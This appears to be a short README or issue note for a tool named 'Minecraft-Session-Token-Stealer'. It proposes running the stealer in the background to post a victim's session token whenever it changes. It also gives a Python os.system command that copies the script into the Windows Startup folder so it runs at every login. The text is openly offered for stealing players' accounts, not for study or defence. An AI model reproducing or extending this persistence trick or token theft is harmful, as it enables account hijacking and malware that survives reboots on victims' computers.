Minecraft-Session-Token-Stealer
Minecraft-Session-Token-Stealer copied to clipboard
Background Check (IDEA)
The program runs in the background / on startup and whenever the session id changes it posts the updated one.
If you do:
os.system('copy %s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup"' % (sys.argv[0]))
at the end of the script it will execute itself every time the user logs in
It wont check if the session changes but that's quite close